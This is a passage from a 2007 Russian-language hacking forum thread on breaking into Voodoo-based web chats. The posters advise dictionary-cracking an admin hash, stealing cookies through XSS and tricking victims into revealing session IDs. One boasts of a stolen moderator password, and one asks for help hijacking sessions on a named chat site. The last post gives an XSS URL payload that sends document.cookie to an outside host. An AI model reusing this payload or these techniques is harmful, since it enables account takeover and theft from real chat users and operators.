ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 08.03.2007, 05:17
Аватар для ches
ches
Новичок
Регистрация: 06.03.2007
Сообщений: 7
Провел на форуме:
20017

Репутация: 0
По умолчанию

как его расшифровать ?
 
Ответить с цитированием

  #192  
Старый 08.03.2007, 05:36
Аватар для bxN5
bxN5
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме:
3279330

Репутация: 343


Отправить сообщение для bxN5 с помощью ICQ
По умолчанию

Его расшифровать нельзя,а вот скачать словарик потом скачать password pro (он слова из словаря шифрует по тому же алгоритму и сравнивает) можно.
 
Ответить с цитированием

  #193  
Старый 08.03.2007, 06:08
Аватар для ches
ches
Новичок
Регистрация: 06.03.2007
Сообщений: 7
Провел на форуме:
20017

Репутация: 0
По умолчанию

Мне подсказали что узнать пароль админа возможно только тогда, когда я достану его кукис, как это возможно, и есть ли какой то другой метод получения пароля админа? Неужели нету уязвимостей, никогда не поверю)
 
Ответить с цитированием

  #194  
Старый 08.03.2007, 06:45
Аватар для bxN5
bxN5
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме:
3279330

Репутация: 343


Отправить сообщение для bxN5 с помощью ICQ
По умолчанию

Ну тебе же дали Хss ими и воруй кукисы
 
Ответить с цитированием

  #195  
Старый 23.03.2007, 21:54
Аватар для goodkit
goodkit
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
Провел на форуме:
1180139

Репутация: 78
По умолчанию

ЧАТ - Voodoo. Спизд***л пасс от логина модератора! Когда захожу прав как у обычного юзера, мне сказали(тут на ачате) что возможно есть специальные команды типа _ban_ _kill_ или чё-та типа того. Изучал исходники, ничего там не нашел! Что это может быть! ЭТо Аккаунт модератора - 100%!
 
Ответить с цитированием

  #196  
Старый 24.03.2007, 04:11
Аватар для JRX
JRX
Познающий
Регистрация: 16.11.2006
Сообщений: 39
Провел на форуме:
78316

Репутация: 4
Отправить сообщение для JRX с помощью ICQ
По умолчанию

фига зло такое ..может его уже лишили модерских прав?? как заметили кражу пароля..?!
 
Ответить с цитированием

  #197  
Старый 24.03.2007, 20:42
Аватар для goodkit
goodkit
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
Провел на форуме:
1180139

Репутация: 78
По умолчанию

Всё разобрался, оказывапется ссылка на админку была сделана на маленьком смайле слева вверху )
 
Ответить с цитированием

  #198  
Старый 12.04.2007, 17:35
Аватар для EaSy
EaSy
Новичок
Регистрация: 12.04.2007
Сообщений: 2
Провел на форуме:
6773

Репутация: 1
По умолчанию

Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru

Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=(

И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю.

Заранее благадарю, с уважением ИЗ.
 
Ответить с цитированием

  #199  
Старый 12.04.2007, 23:40
Аватар для goodkit
goodkit
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
Провел на форуме:
1180139

Репутация: 78
По умолчанию

Цитата:
Сообщение от EaSy  
Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru

Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=(

И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю.

Заранее благадарю, с уважением ИЗ.
Чат действительно Voodoo, чё то он грузитца как будто у меня dial-up стоит

Ну попповоду сниферов юзай поиск, тут про xss и сниферы уже можно томов 5 собрать! А сессию открой html страницу sendera (это тот прямоугольничег где ты текст печатаешь что бы отправить) в txt и найди session, выглядеть будет так session=dd165fb008f5aac025a34ec7fa788939

Или там где мой статус, кликни правой кнопкой и зайди в свойства (смотрел чат через IE 6)

Но предупреждаю! Я один раз с помощью СИ зоставил жертву выдать мне её сессию, но мне пришло лиж #1234, потом выяснил что в чате стоял фильтр!!! Так что придумаешь что нибудь!

Так и есть, если просто вбить сессию то фильтр её отфильтрует!

Последний раз редактировалось goodkit; 12.04.2007 в 23:48..
 
Ответить с цитированием

  #200  
Старый 13.04.2007, 12:52
Аватар для cyber_rat
cyber_rat
Новичок
Регистрация: 12.04.2007
Сообщений: 7
Провел на форуме:
18672

Репутация: 0
По умолчанию

Здраствуйте. Помогите новичку с составлением запроса для XSS. Нашел стандартную уязвимость в одном Voodoo-чате :
http://xxx.xxx/go.php?url=javascript:alert(/test/);
Составил следущий код:
http://ххх.ххх/go.php?url=javascript:img=new%20Image();img.src="h ttp://s.netsec.ru/cyber_rat.gif?"+document.cookie;

Но вместо рисунка появляется "[object]"

И еще :
alert(/test/); - выводит окошко с надписью /test/
но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
voodoo уязвимость при банне JRX Чаты 6 19.11.2006 01:42
Привет парни помогите с Voodoo чат chat.tus.ru Spider_Klim Чаты 3 27.07.2006 09:48
Чаты августа ломаются ? SEVKA Чаты 123 25.05.2006 10:50
Voodoo chat Guest Чаты 8 08.07.2005 12:01
VooDoo чаты Spectrum Чаты 6 16.05.2005 20:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ